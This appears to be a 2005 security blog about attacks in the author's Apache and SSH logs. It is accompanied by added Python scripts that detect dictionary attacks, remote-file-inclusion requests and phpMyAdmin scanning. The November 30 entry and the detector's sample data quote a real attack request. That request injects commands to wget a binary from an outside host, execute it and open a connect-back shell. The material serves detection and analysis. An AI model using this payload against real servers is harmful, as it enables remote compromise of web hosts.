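As an added example (not part of the original post or of Logwatch), a short Python script that turns Logwatch's "Failed logins" lines into a per-source summary: it strips the ::ffff: IPv4-mapped prefix so the same address aggregates however sshd recorded it, totals the attempts, counts distinct usernames, and flags a source that ran through many names as a dictionary attack. The sample lines are constructed in the format shown above; the threshold of ten attempts is an arbitrary assumption.

```python
"""Summarise Logwatch 'Failed logins from these:' lines per source address.

Added example, not code from the original post or from Logwatch. The sample
block below is constructed in Logwatch's output format."""
from __future__ import annotations

import re
from collections import defaultdict

# Logwatch line shape: "    user/password from ::ffff:72.20.218.49: 2 Time(s)"
LINE_RE = re.compile(
    r"^\s*(?P<user>\S+)/password from (?P<addr>\S+?): (?P<count>\d+) Time\(s\)\s*$"
)


def normalise_addr(addr: str) -> str:
    """Strip the IPv4-mapped IPv6 prefix so ::ffff:a.b.c.d and a.b.c.d aggregate together."""
    return addr[7:] if addr.lower().startswith("::ffff:") else addr


def summarise(lines, threshold: int = 10) -> dict[str, dict]:
    """Per-source totals, distinct usernames tried, and a dictionary-attack flag.

    A source is flagged when it reaches the attempt threshold (assumed: 10) while
    cycling through more than one username; a single user mistyping a password
    many times does not trip it."""
    stats: dict[str, dict] = defaultdict(lambda: {"attempts": 0, "users": set()})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # section headers and unrelated lines are skipped
        src = normalise_addr(m.group("addr"))
        stats[src]["attempts"] += int(m.group("count"))
        stats[src]["users"].add(m.group("user"))
    return {
        src: {
            "attempts": s["attempts"],
            "distinct_users": len(s["users"]),
            "dictionary_attack": s["attempts"] >= threshold and len(s["users"]) > 1,
        }
        for src, s in stats.items()
    }


# Constructed sample in Logwatch's format (not the post's full list)
SAMPLE = """\
Failed logins from these:
    admin/password from ::ffff:72.20.218.49: 1 Time(s)
    test/password from ::ffff:72.20.218.49: 4 Time(s)
    guest/password from ::ffff:72.20.218.49: 1 Time(s)
    sales/password from ::ffff:72.20.218.49: 2 Time(s)
    oracle/password from ::ffff:72.20.218.49: 3 Time(s)
    bob/password from 192.0.2.10: 2 Time(s)
"""

if __name__ == "__main__":
    for src, s in summarise(SAMPLE.splitlines()).items():
        flag = "DICTIONARY ATTACK" if s["dictionary_attack"] else "ok"
        print(f"{src}: {s['attempts']} attempts, {s['distinct_users']} users -> {flag}")
```

Feed it the whole Logwatch mail and the flagged addresses are the ones worth a WHOIS lookup and an abuse report, which is exactly the follow-up described in the March 9 entry.
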
 

November 30, 2005

Script Kiddies attack my Linux/Apache box

I am seeing attacks on popular open-source software that runs on linux, e.g.

129.27.140.4 - - [29/Nov/2005:23:00:48 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST
[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://148.81.141.12/cmd.gif?&cmd=cd%20/tmp;wget%20
131.155.98.128/cback;chmod%20744%20cback;./cback%20
194.112.220.37%208080;echo%20YYY;echo| 
HTTP/1.1" 404 293 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"


(I have broken the line up to fit. It's one entry, or request, from my Apache 2.0 log file. It's a Fedora Core 4 install, mostly default.)

These are slightly more complex attacks, and they show the difficulty of tracking down your attacker. The requester, 129.27.140.4 tracks here: optikom2.inw.tu-graz.ac.at, -- the Graz University of Technology in Austria. But the request is calling a script from here: lilo.pjwstk.edu.pl, the POLSKO-JAPONSKA WYZSZA SZKOLA TECHNIK KOMPUTEROWYCH in Poland. It uses more code from here: pc01.irce.tue.nl , someone's computer in the Netherlands. Finally, it looks like this server gets notified:
194.112.220.37: www.lbsschrems.at, WVNET Information und Kommunikation GmbH, someone's server in Austria. That server is running phpGroupWare, and has probably already been compromised and is now being used to compromise other machines. You could check for bugs in phpGroupWare, but their server's down.

The code here, http://131.155.98.128/cback, appears to be something in C that requires some include files. The initial script, http://148.81.141.12/cmd.gif, is a defacement script. Note that it doesn't open in Netscape -- just IE.

<!-- Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com if you are going to modify the code, please keep the names of its original authors and please get in touch with me... hey folks, seriously, there are a lot of bastards who simply use it; don't just be a sucker of the script, don't be an imbecile lamer, don't be a shitty script kiddie, don't be a jerk, help improve it too!! -->

At least our script writer left us his email address. He just wrote the code, of course; he's not the one trying to use it to deface a site. Right. There were additional lines in my Apache log file that showed attacks against other applications (not installed on my box): WordPress, phpGroupWare, Drupal and AWStats. What weakness do these applications have in common? XML-RPC on PHP.

It looks like Apache needs a tool similar to Windows/IIS's urlscan, which prevents attacks like these from getting to the webserver in the first place. These attacks are increasingly common, but there are no newspaper headlines, as was the case with attacks that took advantage of Microsoft vulnerabilities. These don't attack a single product, but holes in applications that are built on the ability to run things at the command line from a web request. It makes for great functionality and weak security.

Weak web applications may mean your firewall is really just a router for port 80 traffic.

November 29, 2005

A New Attack

Just when I was running out of memory to run my new photo gallery (Gallery 2), I checked my log files to see what was causing some issues for me. It turns out that Gallery2 and SELinux do not get along so well, but if you edit your policy files, it can be made to work.

The new attack:

195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /phpmyadmin/main.php HTTP/1.0" 404 296 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /PMA/main.php HTTP/1.0" 404 289 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /admin/main.php HTTP/1.0" 404 291 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /mysql/main.php HTTP/1.0" 404 291 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /dbadmin/main.php HTTP/1.0" 404 293 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /db/main.php HTTP/1.0" 404 288 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 300 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/pma/main.php HTTP/1.0" 404 295 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 302 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/mysql/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /mysql-admin/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpmyadmin2/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 302 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 404 302 "-" "pmafind"

Apparently, there's a new tool out called "pmafind" looking for phpmyadmin installs. I hadn't seen this one before. I guess enough people have phpmyadmin installed in some unprotected directory to make this worthwhile.
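An added example, not code from either post: a small Python detector for Apache access logs that covers both the Mambo remote-file-inclusion/command-injection entry quoted in the November 30 post and the pmafind entries in this one. It URL-decodes the request path and matches it against rules shaped after those payloads (a parameter set to an http:// URL, a cmd= parameter or a shell command chained after a semicolon), recognizes the pmafind User-Agent, and flags any source that collects a burst of 404s, which is what probing for applications you don't run looks like from the server side. The sample log lines are constructed after the entries quoted in the two posts; the rule set and the 404 threshold are assumptions, not an authoritative signature list.

```python
"""Flag hostile requests in Apache access-log lines.

Added example, not code from the original posts. The detection rules are shaped
after the payloads quoted there and are assumptions, not an authoritative
signature set; the sample log lines are constructed."""
from __future__ import annotations

import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Apache combined log format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Rules applied to the URL-decoded request path (assumed, derived from the quoted entries)
RULES = [
    # a parameter whose value is itself a URL: remote file inclusion (mosConfig_absolute_path=http://...)
    ("remote-file-inclusion", re.compile(r"=(https?|ftp)://", re.I)),
    # a cmd= parameter, or a shell command chained after a semicolon (wget, chmod, ...)
    ("command-injection", re.compile(r"(\bcmd=|;\s*(wget|curl|fetch|chmod|rm)\b)", re.I)),
]
# User-Agent strings of known scanners (pmafind is the one seen in the post)
SCANNER_AGENTS = {"pmafind"}


def parse(line: str) -> dict | None:
    """Split one combined-format line into fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: dict) -> list[str]:
    """Names of the rules a single request trips."""
    decoded = unquote(entry["path"])
    hits = [name for name, rx in RULES if rx.search(decoded)]
    if entry["ua"].lower() in SCANNER_AGENTS:
        hits.append("scanner-agent")
    return hits


def analyse(lines, burst_404: int = 5) -> dict[str, dict]:
    """Per-source summary: request count, rule hits, and a probing flag once the
    number of 404s reaches burst_404 (assumed threshold)."""
    per_ip = defaultdict(lambda: {"requests": 0, "not_found": 0, "hits": Counter()})
    for line in lines:
        e = parse(line)
        if e is None:
            continue
        s = per_ip[e["ip"]]
        s["requests"] += 1
        if e["status"] == "404":
            s["not_found"] += 1
        for name in classify(e):
            s["hits"][name] += 1
    for s in per_ip.values():
        s["probing"] = s["not_found"] >= burst_404
        s["hits"] = dict(s["hits"])
    return dict(per_ip)


# Constructed sample lines, shaped after the entries quoted in the two posts
SAMPLE_LOG = [
    '129.27.140.4 - - [29/Nov/2005:23:00:48 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content'
    '&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://148.81.141.12/cmd.gif?'
    '&cmd=cd%20/tmp;wget%20131.155.98.128/cback;echo%20YYY;echo| HTTP/1.1" 404 293 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
]
for d in ("phpmyadmin", "PMA", "admin", "mysql", "dbadmin"):
    SAMPLE_LOG.append(
        f'195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /{d}/main.php HTTP/1.0" 404 296 "-" "pmafind"'
    )
# an ordinary request for contrast
SAMPLE_LOG.append('198.51.100.7 - - [29/Nov/2005:23:01:00 -0500] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"')

if __name__ == "__main__":
    for ip, summary in analyse(SAMPLE_LOG).items():
        print(ip, summary)
```

Rules of this shape are what mod_security applies to Apache requests at arrival time, which is the closer analogue to urlscan the November 30 post asks for; running them over the log afterwards, as here, at least tells you which sources to block and which applications were being probed for.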



More attacks to come...

November 18, 2005

Nessus: Security Scanning on Linux and Windows

There are some great tools available for Linux. Unfortunately, a lot of people don't use them for a variety of reasons. They don't understand Linux, and there's no standard interface on Linux, except for the über-powerful command line. (I'm still annoyed that most distributions set the default boot to the GUI.)


Nessus is one of those tools. It installs easily from the command line and it has a friendly setup script. Once you complete it, you can start the Nessus server on your Linux box. Someone has even written a friendly Windows client for Nessus, so you can control your scans from Windows.


What's the point? Nessus is a powerful security scanner/vulnerability finder that probably matches most of what's on the market. It stores results to a database (or databases), has a diff feature so you can easily track changes over time, and has a great number of options. It has nearly 10,000 plugins to run platform-specific attacks, and it does a good job of OS fingerprinting.


So I continue experimenting with Nessus, of course, on my own systems. I can have a Nessus scan against my firewall open in one window and I can watch my firewall logs in another. (Remote syslog is cool. Who knew that even cheap routers can log to syslog?)


Competing products have sexier interfaces and reports, but they cost a lot more.